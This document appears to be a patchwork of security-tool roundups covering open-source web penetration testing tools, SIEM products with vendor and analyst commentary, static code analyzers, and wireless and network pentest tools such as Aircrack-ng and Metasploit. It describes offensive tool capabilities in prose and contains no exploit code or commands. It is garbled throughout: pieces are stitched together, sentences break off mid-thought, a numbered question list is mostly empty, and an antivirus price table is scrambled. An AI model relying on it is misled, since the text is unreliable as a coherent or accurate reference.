going to thw server. You can also modify the request or response before they are received by server
or browser.
If you are a beginner, this tool is not for you. This tool was designed for those who have a good
understanding of HTTP protocol and can write codes.
Webscarab provides many features which helps penetration testers work closely on a web
application and find security vulnerabilities. It has a spider which can automatically find new URLs of
the target website. It can easily extract scripts and HTML of the page. Proxy observes the traffic
between server and your browser, and you can take control of the request and response by using
available plugins. Available modules can easily detect most common vulnerabilities like SQL
injection, XSS< CRLF and many other vulnerabilities.
Source code of the tool is available on Github: https://github.com/OWASP/OWASP-WebScarab
Download WebScarab
here:https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
Skipfish
Skipfish is also a nice web application security tool. It crawls the website and then check each pages
for various security threats and at the end prepares the final report. This tool was written in C. It is
highly optimized for HTTP handling and utilizing minimum CPU. It claims that it can easily handle
2000 requests per second without adding a load on CPU. It use a heuristics approach while crawling
and testing web pages. This tool also claims to offer high quality and less false positives.
This tool is available for Linux, FreeBSD, MacOS X and Windows.
Download Skipfish or code from GOogle Codes: http://code.google.com/p/skipfish/
Ratproxy
Ratproxy is also an open source web application security audit tool which can be used to find
security vulnerabilities in web applications. It is supports Linux, FreeBSD, MacOS X, and Windows
(Cygwin) environments.
This tool is designed to overcome the problems users usually face while using other proxy tools for
security audits. It is capable of distinguishing between CSS stylesheets and JavaScript codes. It also
supports SSL man in the middle attack, which means you can also see data passing through SSL.
You can read more about this tool here:http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Download http://code.google.com/p/ratproxy/
SQLMap
SQLMap is another popular open source penetration testing tool. It automates the process of finding
and exploiting SQL injection vulnerability in a websites database. It has a powerful detection engine
and many useful features. So, a penetration tester can easily perform SQL injection check on a
website.
It supports range of database servers including MySQL, Oracle, PostgreSQL, Microsoft SQL Server,
Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB. It offers full support to 6
kinds of SQL injection techniques: time-based blind, boolean-based blind, error-based, UNION
query, stacked queries and out-of-band.
Access the source code on Github repository:https://github.com/sqlmapproject/sqlmap
Download SQLMap here: https://github.com/sqlmapproject/sqlmap
Wfuzz
Wfuzz is another freely available open source tool for web application penetration testing. It can be
used to brute force GET and POST parameters for testing against various kinds of injections like
SQL, XSS, LDAP and many others. It also supports cookie fuzzing, multi-threading, SOCK, Proxy,
Authentication, parameters brute forcing, multiple proxy and many other things. You can read more
about the features of the tool here: http://code.google.com/p/wfuzz/
This tool does not offer a GUI interface, so you will have to work on command line interface.
Download Wfuzz from code.google.com: http://code.google.com/p/wfuzz/
Grendel-Scan
Grendel-Scan is another nice open source web application security tool. This is an automatic tool for
finding security vulnerabilities in web applications. Many features are also available for manual
penetration testing. This tool is available for Windows, Linux and Macintosh. This tool was developed
in Java.
Download the tool and source code: http://sourceforge.net/projects/grendel/
Watcher
Watcher is a passive web security scanner. It does not attack with loads of requests or crawl the
target website. It is not a separate tool but is an add-on of Fiddler. So you need to first install Fiddler
and then install Watcher to use it.
It quietly analyzes the request and response from the user-interaction and then makes a report on
the application. As it is a passive scanner, it will not affect the websites hosting or cloud
infrastructure.
Download watcher and its source code: http://websecuritytool.codeplex.com/
X5S
X5s is also a Fiddler add-on which aims to provide a way to find cross-site scripting vulnerabilities.
This is not an automatic tool. So, you need to understand how encoding issues can lead to XSS. You
need to manually find the injection point and then check where XSS can be in the application.
We have covered the X5S in a previous post. So, you can refer to that article to read more about
X5S and XSS.
Download X5S and source code from codeplex: http://xss.codeplex.com/
You can also refer to this official guide to know how to use
X5S:http://xss.codeplex.com/wikipage?title=tutorial
Arachni
Arachni is an open source tool developed for providing a penetration testing environment. This tool
can detect various web application security vulnerabilities. It can detect various vulnerabilities like
SQL Injection, XSS, Local File inclusion, remote file inclusion, unvalidated redirect, and many others.
Download this tool here: http://www.arachni-scanner.com/
Final Word
These are the best open source web application security testing tools. I tried my best to list all the
tools available online. If a tool was not updated for many years, I did not mention it here. Because if
a tool is more than 10 years old, it can create compatibility issues in the recent environment. If you
are a developer, you can also join the developers community of these tools and help these tools to
grow. By helping these tools, you will also increase your knowledge and expertise.
If you want to start penetration testing, I will recommend using Linux distributions which have been
created for penetration testing. These environments are backtrack, gnacktrack, backbox and
blackbuntu. All these tools come with various free and opensource tools for website penetration
testing. So, you can go with those environments.
If you think I forgot to mention an important tool, you can drop a comment and I will try to add it.
8 SIEM TOOLS :
"The best way to compare SIEM products is to fully understand what problem is you are looking for
them to solve," says Mav Turner, director of the security group at Austin-based SolarWinds Inc. "As
fun as it is to play feature bingo and to let a vendor demonstrate the thousands of things a product
can do, administrators should make sure they understand the few critical things they absolutely need
to the product to do. If the core use cases can't be quickly demonstrated, they should probably
evaluate other products."
Integration of traditional logs with other event sources, such as Threat Intelligence, Identity
and Access Management systems (IAM) Database Activity Monitoring (DAM), NetFlow/DPI, File
Integrity Monitoring and Application logging
Aggregation and filtering at the collector level (with selectable fields and summarization of
fields)
Summarization tables
Dropped/unparsable events
Redundancy
How do I feed data in from a host through redundant parsers to redundant log
management (compliance/1 year) data stores?
Ability to forward the same log source from a single collection point to multiple
destinations (primary log management, secondary log management, product correlation,
development correlation)
Role-based access controls Can the system be configured for Umpqua access to
specific subsets of data/content with a mix of read and read/write/create permissions?
management locally at each Umpqua, but master/global content pushed and synched from a
managed services group with local content not overridden, but global content incorporated
and overwritten?
Inputs
How can we integrate with Government, Risk, Compliance (GRC) and vulnerability
management to provide a common dashboard?
customers, the larger and more established SIEM providers that also offer on-premises SIEM
generally assume the company also has experience with the technology, says Howie.
Howie noted that while the providers he has dealt with recognize that log data is the property of the
client, the clients need to understand that log data potentially can contain personally identifiable
information (PII) or protected health information (PHI). For example, the SIEM could alert on a file
transfer and collect the data from the transfer in a log file. That log file could contain a Social
Security Number or a patient's private data. He recommends that if the company collects protected
data, it should sign a Business Associate Agreement or a similar agreement with the cloud provider
to ensure the data is handled appropriately.
Unlike traditional, on-premises software, cloud-based SIEM generally is billed on a usage model
rather than per server or per user, Howie says. However, if the SIEM software sends all data logs to
the cloud or is otherwise improperly configured, the bandwidth cost from the cloud provider could be
very high and negate other cost efficiencies from the cloud.
"Continually tuning a SIEM as well as looking at the alerts can be a time-consuming task for skilled
professionals," says 451 Research senior security analyst Javvad Malik. "Smaller enterprises may
find greater benefits in utilizing a SaaS-based or managed security services provider (MSSP)
offering that will alleviate some of the ongoing demands."
"SIEMs as a product family set vary tremendously in deployment types, pricing structure, features
and the like. Some may be on-premises, others SaaS, some may charge per device, others by
number of events processed, some have features built into their own offering whilst others partner
with other vendors so comparing pricing and offerings is not a straightforward task," Malik adds.
Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act of
1996 (HIPAA), Federal Information Security Management Act of 2002 (FISMA), Sarbanes-Oxley Act
of 2002 (SOX) and other compliance standards. The software runs on VMware or Microsoft Hyper-V
virtual machines.
"Any SIEM can do log aggregation," Turner says. "This is a basic feature for a SIEM and often what
a lot of people are looking for in order to check a box for their auditor. Once they have the logs,
though, to get real value they need a solution that will also find problems and help sort through the
massive amounts of data quickly."
Users should see clear categories of activities so they can drill into the ones that are suspicious, he
adds. Event normalization is critical to a powerful SIEM and SolarWinds is starting to see the
emergence of threat intelligence feeds and integration of SIEMs with them. "While this is a great
addition," Turner notes, "it's critical to understand where the value is here and not get fooled into
thinking it equates to 'security in a box' by deploying solutions simply because they claim to have
that functionality."
"If a managed service provider is not an option, several SIEM vendors tailor to the SMB space by
offering solutions that are relatively less expensive and easier to manage when compared with their
full blown offerings," says Kent Saunders, a senior consultant at Accuvant.
These include:
ArcSight Express for SIEM/Correlation functionality and ArcSight Logger for Log
Management;
McAfee ESM (Enterprise Security Manager) appliance handles both SIEM/Correlation and
Log Management;
IBM Security QRadar All in One appliance handles both SIEM/Correlation and Log
Management;
Splunk Enterprise software or virtual machines for log management has ability for a user to
write their own custom correlations and SIEM-like dashboards;
LogRhythm's appliance, software and virtual machines handles both SIEM/Correlation and
Log Management
Here's a more detailed look at HP's ArcSight, LogRhythm, SolarWinds, and Splunk.
ArcSight
Hewlett-Packard's ArcSight is primarily an enterprise-class SIEM offering, although the offering can
scale down for smaller enterprises. The ArcSight Express rack-mount appliance includes a vast
array of built-in capabilities. In addition to the log management capabilities that comprise the raison
dtre for SIEM, the appliance can collect, store and analyze all security data from a single interface.
The software is capable of analyzing millions of security events from firewalls, intrusion protection
systems, end-point devices, and an array of other log- and data-producing devices. It boasts built-in
security dashaboards and audit reports that visualize threats and compliance and is able to protect
against zero-day attacks, advanced persistent threats, breach attempts, insider attacks, malware
and unauthorized user access.
ArcSight Enterprise Security Manager (ESM) is targeted at large-scale, security event management
applications. ArcSight Experess "should be considered for midsize SIEM deployments (while) ESM
is appropriate for larger deployments, as long as sufficient in-house support resources are
available," according to Gartner.
ArcSight Logger can be used for log management capabilities for two-tier deployments. It also has
optional modules that can be used for advanced support for user activity monitoring, identity and
access management integration and fraud management. ArcSight pricing is based on a more
traditional software model that is more complex than SolarWinds or Splunk.
LogRhythm
LogRhythm All-In-One (XM) appliance and software is designed for midsized to large enterprises. It
includes a dedicated event manager, dedicated log manager, dedicated artificial intelligence engine,
site log forwarder and a network monitor. Each of the software components also is available in a
SolarWinds
SolarWinds' Log & Event Manager is targeted at the SMB market but can scale for to larger
businesses. The offering has prepackaged templates and an automated log management system.
Among the features the company identifies as must-haves for a SIEM offering is the ability to collect
data from network devices, machine data and cloud logs, as well as in-memory event correlation for
real-time threat detection. Additional must-have features include a flexible deployment option for
scalable log collection and analysis, out-of-the-box reporting for security, compliance and operations,
forensic analysis, and built-in active response for automated remediation.
Other features the company identifies as essential are the ability to do internal data loss protection,
embedded file integrity monitoring for threat detection and compliance support, plus high
compression and encryption for secure long archival and long management. SolarWinds is using
node-based pricing.
Splunk
Like other SIEM products, the core of Splunk Enterprise monitors and manages application logs,
business process logs, configuration files, web access and web proxy logs, Syslog data, database
audit logs and tables, filesystem audit logs, and operating system metrics, status and diagnostic
commands. But at Splunk, the focus is on machine data -- the data generated by all of the systems
in the data center, the connected "internet of things," and other personal and corporate devices that
get connected to the corporate network.
Splunk offers three versions of its product:
Splunk Free that caps indexing to 500MB per day and a limited feature set;
Splunk Enterprise for on-premises SIEM with all of the company's features;
Splunk Cloud, which can scale up to multiple terabytes per day and offers the full feature set
with the exception of the distributed management console and multi-site clustering. The
clustering option is available on request for the cloud package.
Although the product has "enterprise" in its name, Splunk says the solution can be used by SMBs as
well and has been architected for use by non-SIEM experts. Non-SIEM engineers will be able to use
the event pattern detection, instant Pivot interface that enables users to discover relationships in
data without mastering the search language, and dashboards that can share pre-built panels that
integrate multiple charts and views over time.
Splunk Enterprise offers both a perpetual license that starts at $4,500 for 1 GB/day plus support and
a term license that starts at $1,800 per year and includes support.
How well does the platform handle the log sources? Will it work out of the box or will there be
a lot of custom development work required?
2.
What out of the box reports are available for security and compliance?
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
Is there a desire for the product to have an operational role rather than be specific to
security?
13.
14.
How does the product handle older data that has been archived off-box?
15.
16.
Additionally, here are some questions potential clients should ask that generally are not asked:
1.
How many of the original product developers are still with the company?
2.
What is your average first contact time as well as the time to resolution for support tickets of
each ticket priority level?
3.
How many full time employees will I need for a deployment of this size?
4.
How do you do log tiers: Log (Splunk Enterprise, ArcSight logger, Log Logic) > SIEM (Splunk
Enterprise Security, ArcSight, QRadar, McAfee ESM (Enterprise Security Manager) >
Automation (automatically run a script, open a ticket, take a VM snapshot, etc) > Data
(Hadoop storage)
SIEM Overview
Some vendors combine SIEM with a combination of vulnerability
management, file integrity, policy auditing and IPS as options. Other vendors
integrate SIEM into their Identity and Access management solutions and and
some vendors provide SIEM as a point solution on its own.
SIEM as a product is a combination of Information Management, Event
Management and network behaviour analysis tools providing a complete
vision of log data and real time events. Some companies only require one or
the other (Information Management or Event Management). Information
Management is used for historical and compliance purposes and Event
Management for real time attack analysis. Some vendors also provide these
as separate products.
Alert Logic is a cloud solutions vendor and offer a cloud based Incident and
Event Log Monitoring service.
GFI Software is a vendor focussed on IT solutions for small and mediumsized businesses. GFI offer their centralised event log monitoring and
management solution known as GFIEventsManager.
IBM ISS have an SIEM product in Tivoli Security Information and Event
Manager. IBM also has other log and event management solutions.
RSA (EMC) is a well known security vendor and a division of EMC. RSA is a
market leader for their 2 factor authentication solutions. RSA also has an
SIEM product ranked highly in their RSA Envision product.
9.8 Visit
$39.99
$19.9
9
$29.99
$19.9
9
$29.99
$23.9
6
$69.95
$22.4
9
$31.99
McAfee
Review
More
Products
>>
9.4
Visit
Site
>>
Norton
Review
More
Products
>>
9.1
Visit
Site
>>
BullGuard
Review
More
Products
>>
8.7
Visit
Site
>>
$51.99
Site
>>
More
Products
>>
8.3
Visit
Site
>>
Avira
Review
More
Products
>>
8.3 Visit
Site
Panda
Security
Review
>>
More
Products
>>
$39.99
$19.9
9
Eset Review
$34.95
$24.9
5
$59.95
$24.9
5
$59.95
$38.9
7
8.1
7.8
Visit
Site
>>
More
Products
>>
Visit
Site
>>
7.5
Visit
Site
>>
Bitdefender More
Review
Products
>>
7.3
Visit
Site
>>
Kaspersky
Review
More
Products
>>
Recommended Site
Disclaimer: We work hard to offer you valu
may find lexical, syntactic and semantic defects, if you are relying too heavily on your
compiler to identify coding defects, you may find your code isnt maintainable or
transferable. Even code that compiles without warnings may have errors associated
with the implementation of the requirements.
HP Fortify Software Static Code Analyzer Helps developers identify software security
vulnerabilities in C, C++, Java, JSP, .NET, ASP.NET, classic Active Server Pages (ASP),
ColdFusion, PHP, Visual Basic 6, VBScript, JavaScript, PL/SQL, T-SQL, Python, Objective-C
and COBOL and configuration files
IBM Rational AppScan Source Edition Analyzes source code to identify security
vulnerabilities while integrating security testing with software development processes and
systems. Supports C, C++, .NET, Java, JSP, JavaScript, ColdFusion, Classic ASP, PHP, Perl,
Visual Basic 6, PL/SQL, T-SQL, and COBOL
Black Duck Software Suite Analyzes the composition of software source code and binary
files, searches for reusable code, manages open source and third-party code approval,
honors the legal obligations associated with mixed-origin code, and monitors related security
vulnerabilities.
Compuware Topaz for Program Analysis [1] A static code analysis for PL/I and COBOL.
Produces visual displays of structure charts and logic/data flow and shows dependencies across
programs.
PENETRATION TESTING:
2. Aircrack-ng is a comprehensive set of network security tools that includes, aircrack-ng
(which can cracks WEP and WPA Dictionary attacks), airdecap-ng (which can decrypts WEP or
WPA encrypted capture files), airmon-ng (which places network cards into monitor mode, for
example when using the Alfa Security Scanner with rtl8187), aireplay-ng (which is a packet
injector), airodump-ng (which is a packet sniffer), airtun-ng (which allows for virtual tunnel
interfaces), airolib-ng (which stores and manages ESSID and password lists), packetforge-ng
(which can create encrypted packets for injection), airbase-ng (which incorporates techniques
for attacking clients) and airdecloak-ng (which removes WEP cloaking). Other tools include
airdriver-ng (to manage wireless drivers), airolib-ng (to store and manages ESSID and password
lists and compute Pairwise Master Keys), airserv-ng (which allows the penetration tester to
access the wireless card from other computers). Airolib-ng is similiar to easside-ng which allows
the user to run tools on a remote computer, easside-ng (permits a means to communicate to
an access point, without the WEP key), tkiptun-ng (for WPA/TKIP attacks) and wesside-ng (which
an an automatic tool for recovering wep keys).
Like most of the security tools in our list, Aircrack also has a GUI interface called Gerix Wifi
Cracker. Gerix is a freely licensed security tool under the GNU General Public License and is
bundled within penetration testing Linux distributions such as BackTrack and Backbox. The
Gerix GUI has several penetration testing tools that allow for network analysis, wireless packet
capturing, and SQL packet injection.
Metasploit is huge. Developed by Rapid7 and used by every pentester and ethical hacker in the
world. Period. The Metasploit Project is a security project which delivers information about
security vulnerabilities and helps penetration testing and Intrusion detection. The open source
project known as the Metasploit Framework, is used by security professionals to execute
exploit code against a remote target machine for penetration testing of course!
Another cool project is Metasploitable which is an intentionally vulnerable version of Ubuntu
Linux built on purpose for testing security tools, like all of ones listed here, and demonstrating
common vulnerabilities.
analyzes the responses. The program is really sophisticated because unlike other port scanners
out there, Nmap sends packets based upon network conditions by taking into account
fluctuations, congestion and more.
802.11, PPP, and even loopback. Like most tools in our 2013 Concise Courses Security List the
captured network data can be monitored and managed via a GUI which also allows for plugins to be inserted and used. Wireshark can also capture VoIP packets (like Cain & Able see tool
3) and raw USB traffic can also be captured.